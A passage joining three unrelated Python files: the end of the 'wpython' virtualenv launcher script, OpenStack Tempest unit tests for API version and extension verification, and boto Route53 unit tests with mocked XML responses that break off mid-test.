Then create the file `/home/jabba/python/wpython_demo/.venv` with this content:
/home/jabba/.virtualenvs/wpython_demo
Say you have a `demo.py` file in this wpython_demo project. Launch it like this:
$ cd /home/jabba/python/wpython_demo
$ wpython demo.py
Notice that we didn't have to activate the virtual environment.
virtualenv example
------------------
Say you put your virtual environment in the root of the project folder
under a subdirectory called "venv". In this case the content of the ".venv"
file can be a relative path:
$ cat .venv
venv
You launch a script the same way as explained for virtualenvwrapper.
Extra feature
-------------
With wpython you can also launch scripts that are not in the project's
root folder but deep in a subfolder. You still need just one ".venv" file
in the project's root. If wpython doesn't find the file `.venv` in the folder
of the script to be launched, it will start stepping back to the parent
folders. It will use the first `.venv` file it finds.
Author:
-------
Laszlo Szathmary, alias Jabba Laci, 2014 (jabba.laci@gmail.com)
https://github.com/jabbalaci
ASCII logo made with http://patorjk.com/software/taag
"""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import shlex
import sys
from subprocess import call
from unipath import Path
VENV_FILE = '.venv' # rename it if you want
DEBUG = True # you can also switch debug mode off with the -s option
def my_call(python_path, prg, args):
"""
Pass the script and its arguments to the Python interpreter in the venv.
"""
cmd = "{pp} {prg} {args}".format(pp=python_path,
prg=prg,
args=' '.join(args))
args = shlex.split(cmd)
call(args)
def find_venv_file(folder):
"""
Find the .venv file. If necessary, go up to the parent folders.
"""
venv_file = Path(folder, VENV_FILE)
while not (venv_file.isfile() or folder == "/"):
folder = folder.parent
venv_file = Path(folder, VENV_FILE)
#
if venv_file.isfile():
if DEBUG:
print("# venv file: {f}".format(f=venv_file), file=sys.stderr)
return venv_file
# else
print("Error: {f} file is missing.".format(f=VENV_FILE), file=sys.stderr)
sys.exit(1)
def print_usage(help=False):
print("Usage: wpython script_in_virtualenvwrapper.py [arg]...")
if help:
print("""
Options:
-h, --help: this help
-s: silent mode (no debug info)
""".strip())
def check_args(args):
"""
Process options passed to wpython.
"""
global DEBUG
if args[0] in ("-h", "--help"):
print_usage(help=True)
sys.exit(0)
if args[0] == "-s":
# silent mode, no debug info
DEBUG = False
args = args[1:]
# Treat all options above. This part below is for the unknown options:
if len(args) == 0:
print_usage()
sys.exit(1)
if args[0].startswith("-"):
print("Error: unknown option: {o}".format(o=args[0]), file=sys.stderr)
sys.exit(1)
return args
def main():
"""
Controller.
"""
args = sys.argv[1:]
if len(args) == 0:
print_usage()
sys.exit(0)
args = check_args(args)
prg = args[0] # script in venv
args = args[1:] # arguments of the script in venv
p = Path(prg).absolute()
venv_file = find_venv_file(p.parent)
venv_dir = Path(venv_file.read_file().strip())
# .venv can also contain a relative path
if not venv_dir.isabsolute():
venv_dir = Path(venv_file.parent, venv_dir).norm()
if not venv_dir.isdir():
print("Error: {vd} is not a directory.".format(vd=venv_dir),
file=sys.stderr)
sys.exit(1)
#
python_path = Path(venv_dir, "bin/python")
if not python_path.isfile():
print("Error: {pp} is missing.".format(pp=python_path),
file=sys.stderr)
sys.exit(1)
if DEBUG:
print("# venv dir: {d}".format(d=venv_dir), file=sys.stderr)
my_call(python_path, prg, args)
##############################################################################
if __name__ == "__main__":
main()
| |
# Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
import mock
from oslo_serialization import jsonutils as json
from tempest.cmd import verify_tempest_config
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.tests import base
from tempest.tests import fake_config
class TestGetAPIVersions(base.TestCase):
def test_remove_version_project(self):
f = verify_tempest_config._remove_version_project
self.assertEqual('/', f('/v2.1/%s/' % data_utils.rand_uuid_hex()))
self.assertEqual('', f('/v2.1/tenant_id'))
self.assertEqual('', f('/v3'))
self.assertEqual('/', f('/v3/'))
self.assertEqual('/something/', f('/something/v2.1/tenant_id/'))
self.assertEqual('/something', f('/something/v2.1/tenant_id'))
self.assertEqual('/something', f('/something/v3'))
self.assertEqual('/something/', f('/something/v3/'))
self.assertEqual('/', f('/')) # http://localhost/
self.assertEqual('', f('')) # http://localhost
def test_url_grab_versioned_nova_nossl(self):
base_url = 'http://127.0.0.1:8774/v2/'
endpoint = verify_tempest_config._get_unversioned_endpoint(base_url)
self.assertEqual('http://127.0.0.1:8774/', endpoint)
def test_url_grab_versioned_nova_ssl(self):
base_url = 'https://127.0.0.1:8774/v3/'
endpoint = verify_tempest_config._get_unversioned_endpoint(base_url)
self.assertEqual('https://127.0.0.1:8774/', endpoint)
def test_get_unversioned_endpoint_base(self):
base_url = 'https://127.0.0.1:5000/'
endpoint = verify_tempest_config._get_unversioned_endpoint(base_url)
self.assertEqual('https://127.0.0.1:5000/', endpoint)
def test_get_unversioned_endpoint_subpath(self):
base_url = 'https://127.0.0.1/identity/v3'
endpoint = verify_tempest_config._get_unversioned_endpoint(base_url)
self.assertEqual('https://127.0.0.1/identity', endpoint)
def test_get_unversioned_endpoint_subpath_trailing_solidus(self):
base_url = 'https://127.0.0.1/identity/v3/'
endpoint = verify_tempest_config._get_unversioned_endpoint(base_url)
self.assertEqual('https://127.0.0.1/identity/', endpoint)
class TestDiscovery(base.TestCase):
def setUp(self):
super(TestDiscovery, self).setUp()
self.useFixture(fake_config.ConfigFixture())
self.patchobject(config, 'TempestConfigPrivate',
fake_config.FakePrivate)
def test_get_keystone_api_versions(self):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': {'values': [{'id': 'v2.0'}, {'id': 'v3.0'}]}}
fake_resp = json.dumps(fake_resp)
self.useFixture(fixtures.MockPatch(
'tempest.lib.common.http.ClosingHttp.request',
return_value=(None, fake_resp)))
fake_os = mock.MagicMock()
versions = verify_tempest_config._get_api_versions(fake_os, 'keystone')
self.assertIn('v2.0', versions)
self.assertIn('v3.0', versions)
def test_get_cinder_api_versions(self):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': [{'id': 'v1.0'}, {'id': 'v2.0'}]}
fake_resp = json.dumps(fake_resp)
self.useFixture(fixtures.MockPatch(
'tempest.lib.common.http.ClosingHttp.request',
return_value=(None, fake_resp)))
fake_os = mock.MagicMock()
versions = verify_tempest_config._get_api_versions(fake_os, 'cinder')
self.assertIn('v1.0', versions)
self.assertIn('v2.0', versions)
def test_get_nova_versions(self):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': [{'id': 'v2.0'}, {'id': 'v3.0'}]}
fake_resp = json.dumps(fake_resp)
self.useFixture(fixtures.MockPatch(
'tempest.lib.common.http.ClosingHttp.request',
return_value=(None, fake_resp)))
fake_os = mock.MagicMock()
versions = verify_tempest_config._get_api_versions(fake_os, 'nova')
self.assertIn('v2.0', versions)
self.assertIn('v3.0', versions)
def test_get_versions_invalid_response(self):
# When the response doesn't contain a JSON response, an error is
# logged.
mock_log_error = self.useFixture(fixtures.MockPatchObject(
verify_tempest_config.LOG, 'error')).mock
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint'))
# Simulated response is not JSON.
sample_body = (
'<html><head>Sample Response</head><body>This is the sample page '
'for the web server. Why are you requesting it?</body></html>')
self.useFixture(fixtures.MockPatch(
'tempest.lib.common.http.ClosingHttp.request',
return_value=(None, sample_body)))
# service value doesn't matter, just needs to match what
# _get_api_versions puts in its client_dict.
self.assertRaises(ValueError, verify_tempest_config._get_api_versions,
os=mock.MagicMock(), service='keystone')
self.assertTrue(mock_log_error.called)
def test_verify_api_versions(self):
api_services = ['cinder', 'glance', 'keystone']
fake_os = mock.MagicMock()
for svc in api_services:
m = 'verify_%s_api_versions' % svc
with mock.patch.object(verify_tempest_config, m) as verify_mock:
verify_tempest_config.verify_api_versions(fake_os, svc, True)
verify_mock.assert_called_once_with(fake_os, True)
def test_verify_api_versions_not_implemented(self):
api_services = ['cinder', 'glance', 'keystone']
fake_os = mock.MagicMock()
for svc in api_services:
m = 'verify_%s_api_versions' % svc
with mock.patch.object(verify_tempest_config, m) as verify_mock:
verify_tempest_config.verify_api_versions(fake_os, 'foo', True)
self.assertFalse(verify_mock.called)
@mock.patch('tempest.lib.common.http.ClosingHttp.request')
def test_verify_keystone_api_versions_no_v3(self, mock_request):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': {'values': [{'id': 'v2.0'}]}}
fake_resp = json.dumps(fake_resp)
mock_request.return_value = (None, fake_resp)
fake_os = mock.MagicMock()
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_keystone_api_versions(fake_os, True)
print_mock.assert_called_once_with('api_v3',
'identity-feature-enabled',
False, True)
@mock.patch('tempest.lib.common.http.ClosingHttp.request')
def test_verify_keystone_api_versions_no_v2(self, mock_request):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': {'values': [{'id': 'v3.0'}]}}
fake_resp = json.dumps(fake_resp)
mock_request.return_value = (None, fake_resp)
fake_os = mock.MagicMock()
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_keystone_api_versions(fake_os, True)
print_mock.assert_called_once_with('api_v2',
'identity-feature-enabled',
False, True)
@mock.patch('tempest.lib.common.http.ClosingHttp.request')
def test_verify_cinder_api_versions_no_v3(self, mock_request):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': [{'id': 'v2.0'}]}
fake_resp = json.dumps(fake_resp)
mock_request.return_value = (None, fake_resp)
fake_os = mock.MagicMock()
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_cinder_api_versions(fake_os, True)
print_mock.assert_any_call('api_v3', 'volume-feature-enabled',
False, True)
self.assertEqual(1, print_mock.call_count)
@mock.patch('tempest.lib.common.http.ClosingHttp.request')
def test_verify_cinder_api_versions_no_v2(self, mock_request):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': [{'id': 'v3.0'}]}
fake_resp = json.dumps(fake_resp)
mock_request.return_value = (None, fake_resp)
fake_os = mock.MagicMock()
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_cinder_api_versions(fake_os, True)
print_mock.assert_any_call('api_v2', 'volume-feature-enabled',
False, True)
self.assertEqual(1, print_mock.call_count)
@mock.patch('tempest.lib.common.http.ClosingHttp.request')
def test_verify_cinder_api_versions_no_v1(self, mock_request):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': [{'id': 'v2.0'}, {'id': 'v3.0'}]}
fake_resp = json.dumps(fake_resp)
mock_request.return_value = (None, fake_resp)
fake_os = mock.MagicMock()
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_cinder_api_versions(fake_os, True)
print_mock.assert_not_called()
def test_verify_glance_version_no_v2_with_v1_1(self):
def fake_get_versions():
return (None, ['v1.1'])
fake_os = mock.MagicMock()
fake_os.image_client.get_versions = fake_get_versions
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_glance_api_versions(fake_os, True)
print_mock.assert_called_once_with('api_v2', 'image-feature-enabled',
False, True)
def test_verify_glance_version_no_v2_with_v1_0(self):
def fake_get_versions():
return (None, ['v1.0'])
fake_os = mock.MagicMock()
fake_os.image_client.get_versions = fake_get_versions
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_glance_api_versions(fake_os, True)
print_mock.assert_called_once_with('api_v2', 'image-feature-enabled',
False, True)
def test_verify_glance_version_no_v1(self):
def fake_get_versions():
return (None, ['v2.0'])
fake_os = mock.MagicMock()
fake_os.image_client.get_versions = fake_get_versions
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_glance_api_versions(fake_os, True)
print_mock.assert_called_once_with('api_v1', 'image-feature-enabled',
False, True)
def test_verify_extensions_neutron(self):
def fake_list_extensions():
return {'extensions': [{'alias': 'fake1'},
{'alias': 'fake2'},
{'alias': 'not_fake'}]}
fake_os = mock.MagicMock()
fake_os.network_extensions_client.list_extensions = (
fake_list_extensions)
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['fake1', 'fake2', 'fake3'])))
results = verify_tempest_config.verify_extensions(fake_os,
'neutron', {})
self.assertIn('neutron', results)
self.assertIn('fake1', results['neutron'])
self.assertTrue(results['neutron']['fake1'])
self.assertIn('fake2', results['neutron'])
self.assertTrue(results['neutron']['fake2'])
self.assertIn('fake3', results['neutron'])
self.assertFalse(results['neutron']['fake3'])
self.assertIn('not_fake', results['neutron'])
self.assertFalse(results['neutron']['not_fake'])
def test_verify_extensions_neutron_all(self):
def fake_list_extensions():
return {'extensions': [{'alias': 'fake1'},
{'alias': 'fake2'},
{'alias': 'not_fake'}]}
fake_os = mock.MagicMock()
fake_os.network_extensions_client.list_extensions = (
fake_list_extensions)
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['all'])))
results = verify_tempest_config.verify_extensions(fake_os,
'neutron', {})
self.assertIn('neutron', results)
self.assertIn('extensions', results['neutron'])
self.assertEqual(sorted(['fake1', 'fake2', 'not_fake']),
sorted(results['neutron']['extensions']))
def test_verify_extensions_cinder(self):
def fake_list_extensions():
return {'extensions': [{'alias': 'fake1'},
{'alias': 'fake2'},
{'alias': 'not_fake'}]}
fake_os = mock.MagicMock()
# NOTE (e0ne): mock both v1 and v2 APIs
fake_os.volumes_extension_client.list_extensions = fake_list_extensions
fake_os.volumes_v2_extension_client.list_extensions = (
fake_list_extensions)
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['fake1', 'fake2', 'fake3'])))
results = verify_tempest_config.verify_extensions(fake_os,
'cinder', {})
self.assertIn('cinder', results)
self.assertIn('fake1', results['cinder'])
self.assertTrue(results['cinder']['fake1'])
self.assertIn('fake2', results['cinder'])
self.assertTrue(results['cinder']['fake2'])
self.assertIn('fake3', results['cinder'])
self.assertFalse(results['cinder']['fake3'])
self.assertIn('not_fake', results['cinder'])
self.assertFalse(results['cinder']['not_fake'])
def test_verify_extensions_cinder_all(self):
def fake_list_extensions():
return {'extensions': [{'alias': 'fake1'},
{'alias': 'fake2'},
{'alias': 'not_fake'}]}
fake_os = mock.MagicMock()
# NOTE (e0ne): mock both v1 and v2 APIs
fake_os.volumes_extension_client.list_extensions = fake_list_extensions
fake_os.volumes_v2_extension_client.list_extensions = (
fake_list_extensions)
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['all'])))
results = verify_tempest_config.verify_extensions(fake_os,
'cinder', {})
self.assertIn('cinder', results)
self.assertIn('extensions', results['cinder'])
self.assertEqual(sorted(['fake1', 'fake2', 'not_fake']),
sorted(results['cinder']['extensions']))
def test_verify_extensions_nova(self):
def fake_list_extensions():
return ([{'alias': 'fake1'}, {'alias': 'fake2'},
{'alias': 'not_fake'}])
fake_os = mock.MagicMock()
fake_os.extensions_client.list_extensions = fake_list_extensions
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['fake1', 'fake2', 'fake3'])))
results = verify_tempest_config.verify_extensions(fake_os,
'nova', {})
self.assertIn('nova', results)
self.assertIn('fake1', results['nova'])
self.assertTrue(results['nova']['fake1'])
self.assertIn('fake2', results['nova'])
self.assertTrue(results['nova']['fake2'])
self.assertIn('fake3', results['nova'])
self.assertFalse(results['nova']['fake3'])
self.assertIn('not_fake', results['nova'])
self.assertFalse(results['nova']['not_fake'])
def test_verify_extensions_nova_all(self):
def fake_list_extensions():
return ({'extensions': [{'alias': 'fake1'},
{'alias': 'fake2'},
{'alias': 'not_fake'}]})
fake_os = mock.MagicMock()
fake_os.extensions_client.list_extensions = fake_list_extensions
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['all'])))
results = verify_tempest_config.verify_extensions(fake_os,
'nova', {})
self.assertIn('nova', results)
self.assertIn('extensions', results['nova'])
self.assertEqual(sorted(['fake1', 'fake2', 'not_fake']),
sorted(results['nova']['extensions']))
def test_verify_extensions_swift(self):
def fake_list_extensions():
return {'fake1': 'metadata',
'fake2': 'metadata',
'not_fake': 'metadata',
'swift': 'metadata'}
fake_os = mock.MagicMock()
fake_os.capabilities_client.list_capabilities = fake_list_extensions
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['fake1', 'fake2', 'fake3'])))
results = verify_tempest_config.verify_extensions(fake_os, 'swift', {})
self.assertIn('swift', results)
self.assertIn('fake1', results['swift'])
self.assertTrue(results['swift']['fake1'])
self.assertIn('fake2', results['swift'])
self.assertTrue(results['swift']['fake2'])
self.assertIn('fake3', results['swift'])
self.assertFalse(results['swift']['fake3'])
self.assertIn('not_fake', results['swift'])
self.assertFalse(results['swift']['not_fake'])
def test_verify_extensions_swift_all(self):
def fake_list_extensions():
return {'fake1': 'metadata',
'fake2': 'metadata',
'not_fake': 'metadata',
'swift': 'metadata'}
fake_os = mock.MagicMock()
fake_os.capabilities_client.list_capabilities = fake_list_extensions
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['all'])))
results = verify_tempest_config.verify_extensions(fake_os,
'swift', {})
self.assertIn('swift', results)
self.assertIn('extensions', results['swift'])
self.assertEqual(sorted(['not_fake', 'fake1', 'fake2']),
sorted(results['swift']['extensions']))
| |
#!/usr/bin/env python
# Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from tests.compat import mock
import re
import xml.dom.minidom
from boto.exception import BotoServerError
from boto.route53.connection import Route53Connection
from boto.route53.exception import DNSServerError
from boto.route53.healthcheck import HealthCheck
from boto.route53.record import ResourceRecordSets, Record
from boto.route53.zone import Zone
from nose.plugins.attrib import attr
from tests.unit import AWSMockServiceTestCase
from boto.compat import six
urllib = six.moves.urllib
@attr(route53=True)
class TestRoute53Connection(AWSMockServiceTestCase):
connection_class = Route53Connection
def setUp(self):
super(TestRoute53Connection, self).setUp()
self.calls = {
'count': 0,
}
def default_body(self):
return b"""<Route53Result>
<Message>It failed.</Message>
</Route53Result>
"""
def test_typical_400(self):
self.set_http_response(status_code=400, header=[
['Code', 'Throttling'],
])
with self.assertRaises(DNSServerError) as err:
self.service_connection.get_all_hosted_zones()
self.assertTrue('It failed.' in str(err.exception))
@mock.patch('time.sleep')
def test_retryable_400(self, sleep_mock):
self.set_http_response(status_code=400, header=[
['Code', 'PriorRequestNotComplete'],
])
def incr_retry_handler(func):
def _wrapper(*args, **kwargs):
self.calls['count'] += 1
return func(*args, **kwargs)
return _wrapper
# Patch.
orig_retry = self.service_connection._retry_handler
self.service_connection._retry_handler = incr_retry_handler(
orig_retry
)
self.assertEqual(self.calls['count'], 0)
# Retries get exhausted.
with self.assertRaises(BotoServerError):
self.service_connection.get_all_hosted_zones()
self.assertEqual(self.calls['count'], 7)
# Unpatch.
self.service_connection._retry_handler = orig_retry
@attr(route53=True)
class TestCreateZoneRoute53(AWSMockServiceTestCase):
connection_class = Route53Connection
def setUp(self):
super(TestCreateZoneRoute53, self).setUp()
def default_body(self):
return b"""
<CreateHostedZoneResponse xmlns="https://route53.amazonaws.com/doc/2012-02-29/">
<HostedZone>
<Id>/hostedzone/Z11111</Id>
<Name>example.com.</Name>
<CallerReference>aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee</CallerReference>
<Config>
<Comment></Comment>
</Config>
<ResourceRecordSetCount>2</ResourceRecordSetCount>
</HostedZone>
<ChangeInfo>
<Id>/change/C1111111111111</Id>
<Status>PENDING</Status>
<SubmittedAt>2014-02-02T10:19:29.928Z</SubmittedAt>
</ChangeInfo>
<DelegationSet>
<NameServers>
<NameServer>ns-100.awsdns-01.com</NameServer>
<NameServer>ns-1000.awsdns-01.co.uk</NameServer>
<NameServer>ns-1000.awsdns-01.org</NameServer>
<NameServer>ns-900.awsdns-01.net</NameServer>
</NameServers>
</DelegationSet>
</CreateHostedZoneResponse>
"""
def test_create_zone(self):
self.set_http_response(status_code=201)
response = self.service_connection.create_zone("example.com.")
self.assertTrue(isinstance(response, Zone))
self.assertEqual(response.id, "Z11111")
self.assertEqual(response.name, "example.com.")
def test_create_hosted_zone(self):
self.set_http_response(status_code=201)
response = self.service_connection.create_hosted_zone("example.com.", "my_ref", "this is a comment")
self.assertEqual(response['CreateHostedZoneResponse']['DelegationSet']['NameServers'],
['ns-100.awsdns-01.com', 'ns-1000.awsdns-01.co.uk', 'ns-1000.awsdns-01.org', 'ns-900.awsdns-01.net'])
@attr(route53=True)
class TestGetZoneRoute53(AWSMockServiceTestCase):
connection_class = Route53Connection
def setUp(self):
super(TestGetZoneRoute53, self).setUp()
def default_body(self):
return b"""
<ListHostedZonesResponse xmlns="https://route53.amazonaws.com/doc/2012-02-29/">
<HostedZones>
<HostedZone>
<Id>/hostedzone/Z1111</Id>
<Name>example2.com.</Name>
<CallerReference>aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee</CallerReference>
<Config/>
<ResourceRecordSetCount>3</ResourceRecordSetCount>
</HostedZone>
<HostedZone>
<Id>/hostedzone/Z2222</Id>
<Name>example1.com.</Name>
<CallerReference>aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeef</CallerReference>
<Config/>
<ResourceRecordSetCount>6</ResourceRecordSetCount>
</HostedZone>
<HostedZone>
<Id>/hostedzone/Z3333</Id>
<Name>example.com.</Name>
<CallerReference>aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeeg</CallerReference>
<Config/>
<ResourceRecordSetCount>6</ResourceRecordSetCount>
</HostedZone>
</HostedZones>
<IsTruncated>false</IsTruncated>
<MaxItems>100</MaxItems>
</ListHostedZonesResponse>
"""
def test_list_zones(self):
self.set_http_response(status_code=201)
response = self.service_connection.get_all_hosted_zones()
domains = ['example2.com.', 'example1.com.', 'example.com.']
print(response['ListHostedZonesResponse']['HostedZones'][0])
for d in response['ListHostedZonesResponse']['HostedZones']:
print("Removing: %s" % d['Name'])
domains.remove(d['Name'])
self.assertEqual(domains, [])
def test_get_zone(self):
self.set_http_response(status_code=201)
response = self.service_connection.get_zone('example.com.')
self.assertTrue(isinstance(response, Zone))
self.assertEqual(response.name, "example.com.")
@attr(route53=True)
class TestGetHostedZoneRoute53(AWSMockServiceTestCase):
connection_class = Route53Connection
def setUp(self):
super(TestGetHostedZoneRoute53, self).setUp()
def default_body(self):
return b"""
<GetHostedZoneResponse xmlns="https://route53.amazonaws.com/doc/2012-02-29/">
<HostedZone>
<Id>/hostedzone/Z1111</Id>
<Name>example.com.</Name>
<CallerReference>aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee</CallerReference>
<Config/>
<ResourceRecordSetCount>3</ResourceRecordSetCount>
</HostedZone>
<DelegationSet>
<NameServers>
<NameServer>ns-1000.awsdns-40.org</NameServer>
<NameServer>ns-200.awsdns-30.com</NameServer>
<NameServer>ns-900.awsdns-50.net</NameServer>
<NameServer>ns-1000.awsdns-00.co.uk</NameServer>
</NameServers>
</DelegationSet>
</GetHostedZoneResponse>
"""
def test_list_zones(self):
self.set_http_response(status_code=201)
response = self.service_connection.get_hosted_zone("Z1111")
self.assertEqual(response['GetHostedZoneResponse']['HostedZone']['Id'], '/hostedzone/Z1111')
self.assertEqual(response['GetHostedZoneResponse']['HostedZone']['Name'], 'example.com.')
self.assertEqual(response['GetHostedZoneResponse']['DelegationSet']['NameServers'],
['ns-1000.awsdns-40.org', 'ns-200.awsdns-30.com', 'ns-900.awsdns-50.net', 'ns-1000.awsdns-00.co.uk'])
@attr(route53=True)
class TestGetAllRRSetsRoute53(AWSMockServiceTestCase):
connection_class = Route53Connection
def setUp(self):
super(TestGetAllRRSetsRoute53, self).setUp()
def default_body(self):
return b"""
<ListResourceRecordSetsResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
<ResourceRecordSets>
<ResourceRecordSet>
<Name>test.example.com.</Name>
<Type>A</Type>
<TTL>60</TTL>
<ResourceRecords>
<ResourceRecord>
<Value>10.0.0.1</Value>
</ResourceRecord>
</ResourceRecords>
</ResourceRecordSet>
<ResourceRecordSet>
<Name>www.example.com.</Name>
<Type>A</Type>
<TTL>60</TTL>
<ResourceRecords>
<ResourceRecord>
<Value>10.0.0.2</Value>
</ResourceRecord>
</ResourceRecords>
</ResourceRecordSet>
<ResourceRecordSet>
<Name>us-west-2-evaluate-health.example.com.</Name>
<Type>A</Type>
<SetIdentifier>latency-example-us-west-2-evaluate-health</SetIdentifier>
<Region>us-west-2</Region>
<AliasTarget>
<HostedZoneId>ABCDEFG123456</HostedZoneId>
<EvaluateTargetHealth>true</EvaluateTargetHealth>
<DNSName>example-123456-evaluate-health.us-west-2.elb.amazonaws.com.</DNSName>
</AliasTarget>
<HealthCheckId>abcdefgh-abcd-abcd-abcd-abcdefghijkl</HealthCheckId>
</ResourceRecordSet>
<ResourceRecordSet>
<Name>us-west-2-no-evaluate-health.example.com.</Name>
<Type>A</Type>
<SetIdentifier>latency-example-us-west-2-no-evaluate-health</SetIdentifier>
<Region>us-west-2</Region>
<AliasTarget>
<HostedZoneId>ABCDEFG567890</HostedZoneId>
<EvaluateTargetHealth>false</EvaluateTargetHealth>
<DNSName>example-123456-no-evaluate-health.us-west-2.elb.amazonaws.com.</DNSName>
</AliasTarget>
<HealthCheckId>abcdefgh-abcd-abcd-abcd-abcdefghijkl</HealthCheckId>
</ResourceRecordSet>
<ResourceRecordSet>
<Name>failover.example.com.</Name>
<Type>A</Type>
<SetIdentifier>failover-primary</SetIdentifier>
<Failover>PRIMARY</Failover>
<TTL>60</TTL>
<ResourceRecords>
<ResourceRecord>
<Value>10.0.0.4</Value>
</ResourceRecord>
</ResourceRecords>
</ResourceRecordSet>
<ResourceRecordSet>
<Name>us-west-2-evaluate-health-healthcheck.example.com.</Name>
<Type>A</Type>
<SetIdentifier>latency-example-us-west-2-evaluate-health-healthcheck</SetIdentifier>
<Region>us-west-2</Region>
<AliasTarget>
<HostedZoneId>ABCDEFG123456</HostedZoneId>
<EvaluateTargetHealth>true</EvaluateTargetHealth>
<DNSName>example-123456-evaluate-health-healthcheck.us-west-2.elb.amazonaws.com.</DNSName>
</AliasTarget>
<HealthCheckId>076a32f8-86f7-4c9e-9fa2-c163d5be67d9</HealthCheckId>
</ResourceRecordSet>
</ResourceRecordSets>
<IsTruncated>false</IsTruncated>
<MaxItems>100</MaxItems>
</ListResourceRecordSetsResponse>
"""
def test_get_all_rr_sets(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_rrsets("Z1111", "A", "example.com.")
self.assertIn(self.actual_request.path,
("/2013-04-01/hostedzone/Z1111/rrset?type=A&name=example.com.",
"/2013-04-01/hostedzone/Z1111/rrset?name=example.com.&type=A"))
self.assertTrue(isinstance(response, ResourceRecordSets))
self.assertEqual(response.hosted_zone_id, "Z1111")
self.assertTrue(isinstance(response[0], Record))
self.assertTrue(response[0].name, "test.example.com.")
self.assertTrue(response[0].ttl, "60")
self.assertTrue(response[0].type, "A")
evaluate_record = response[2]
self.assertEqual(evaluate_record.name, 'us-west-2-evaluate-health.example.com.')
self.assertEqual(evaluate_record.type, 'A')
self.assertEqual(evaluate_record.identifier, 'latency-example-us-west-2-evaluate-health')
self.assertEqual(evaluate_record.region, 'us-west-2')
self.assertEqual(evaluate_record.alias_hosted_zone_id, 'ABCDEFG123456')
self.assertTrue(evaluate_record.alias_evaluate_target_health)
self.assertEqual(evaluate_record.alias_dns_name, 'example-123456-evaluate-health.us-west-2.elb.amazonaws.com.')
evaluate_xml = evaluate_record.to_xml()
self.assertTrue(evaluate_record.health_check, 'abcdefgh-abcd-abcd-abcd-abcdefghijkl')
self.assertTrue('<EvaluateTargetHealth>true</EvaluateTargetHealth>' in evaluate_xml)
no_evaluate_record = response[3]
